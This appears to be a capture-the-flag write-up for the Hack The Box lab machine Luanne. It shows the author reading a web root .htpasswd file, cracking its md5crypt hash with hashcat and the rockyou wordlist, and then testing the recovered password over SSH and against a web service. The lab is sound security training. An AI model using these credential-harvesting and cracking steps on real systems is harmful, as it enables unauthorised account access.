InfoSec LAB

Luanne_htpasswd

Created: 2 min read

htpasswd

After performing some basic enumeration, I decided to check for the filesystem as it is relatively a new experience for me to engage a NetBSD host

$ pwpwd
/var/www
$ ls -la
total 20
drwxr-xr-x   2 root  wheel  512 Nov 25  2020 .
drwxr-xr-x  24 root  wheel  512 Nov 24  2020 ..
-rw-r--r--   1 root  wheel   47 Sep 16  2020 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17  2020 index.html
-rw-r--r--   1 root  wheel   78 Nov 25  2020 robots.txt

Then I came across the .htpasswd file present in the web root directory

$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

.htpasswd files are presumably used for web security

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ hashcat -a 0 -m 500 webapi_user.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest             
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Time.Started.....: Mon Mar 20 17:31:33 2023 (1 sec)
Time.Estimated...: Mon Mar 20 17:31:34 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    15550 H/s (11.71ms) @ Accel:128 Loops:500 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3072/14344385 (0.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 2688/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidate.Engine.: Device Generator
Candidates.#1....: my3kids -> dangerous
Hardware.Mon.#1..: Util: 40%
 
Started: Mon Mar 20 17:31:19 2023
Stopped: Mon Mar 20 17:31:35 2023

hashcat was able to crack the password hash for the webapi_user user The cracked password is iamthebest

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ sshpass -p iamthebest ssh r.michaels@$IP
r.michaels@10.10.10.218: Permission denied (publickey).

While password reuse isn’t the case for the r.michaels user, I should check it on the web server

It works for the weather application on the web sever on the port 3000

Interactive Graph View

Backlinks